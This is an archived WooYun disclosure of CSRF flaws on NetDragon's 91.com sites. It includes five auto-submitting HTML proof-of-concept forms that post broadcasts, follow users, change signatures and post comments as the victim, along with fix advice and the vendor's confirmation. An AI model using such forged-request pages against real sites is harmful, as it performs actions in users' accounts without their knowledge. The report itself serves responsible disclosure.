当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08367

漏洞标题:福建网龙旗下某站CSRF礼包

相关厂商:福建网龙

漏洞作者: imlonghao

提交时间:2012-06-16 17:12

修复时间:2012-07-31 17:13

公开时间:2012-07-31 17:13

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-16: 细节已通知厂商并且等待厂商处理中
2012-06-18: 厂商已经确认,细节仅向厂商公开
2012-06-28: 细节向核心白帽子及相关领域专家公开
2012-07-08: 细节向普通白帽子公开
2012-07-18: 细节向实习白帽子公开
2012-07-31: 细节向公众公开

简要描述:

福建网龙旗下某处CSRF漏洞,可能导致蠕虫蔓延

详细说明:

在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。

漏洞证明:

【第一处】
漏洞地址:http://t.91.com/broadcast/add

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.91.com/broadcast/add" method="post">
<input type="text" name="tid" value="" />
<input type="text" name="content" value="XX" />
<input type="text" name="secret" value="0" />
<input type="text" name="video" value="" />
<input type="text" name="upimg" value="" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会导致未经用户知情下在91社区中发布广播
=========华丽的分割线=========
【第二处】
漏洞地址:http://t.91.com/

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.91.com/" method="get">
<input type="text" name="controller" value="friend" />
<input type="text" name="action" value="follow" />
<input type="text" name="fid" value="145243793" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会导致在用户为知情的情况下关注某人
=========华丽的分割线=========
【第三处】
漏洞地址:http://bbs.91.com/member/sign

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://bbs.91.com/member/sign" method="post">
<input type="text" name="user_sign" value="XXXX" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会在用户未知情的情况下修改论坛签名档
(这个POST原本还有一个name=submit,后来居然冲突,以为删掉不行,谁知道还是可以POST的。。)
=========华丽的分割线=========
【第四处】
漏洞地址:http://pz.91.com/port/comment_action.php

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://pz.91.com/port/comment_action.php" method="post">
<input type="text" name="content" value="羡慕啊,那么多装备!!!" />
<input type="text" name="name" value="游客" />
<input type="text" name="vericode" value="" />
<input type="text" name="comment" value="http://pz.91.com/html/2012/24/15/18428/index.htm" />
<input type="text" name="title" value="魔域玩家大晒极品装备" />
<input type="text" name="backUrl" value="http://news.91.com/comment/ocommentsend.htm" />
<input type="text" name="url" value="#" />
<input type="text" name="defind" value="" />
<input type="text" name="charset_from" value="gbk" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会在用户未知情的情况下,在引用了这个评论框的地址发布评论,影响范围大
=========华丽的分割线=========
【第五处】
漏洞地址:http://t.91.com/broadcast/rebroadcast

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.91.com/broadcast/rebroadcast" method="post">
<input type="text" name="ownermbrid" value="485158345" />
<input type="text" name="oldbrtid" value="631" />
<input type="text" name="curr_uid" value="485158345" />
<input type="text" name="curr_brtid" value="631" />
<input type="text" name="content" value="XX" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会导致在用户未知情的情况下转发广播

修复方案:

检查POST来路Referer
在POST的信息中加token

版权声明:转载请注明来源 imlonghao@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-06-18 10:13

厂商回复:

感谢imlonghao提交的漏洞

最新状态:

暂无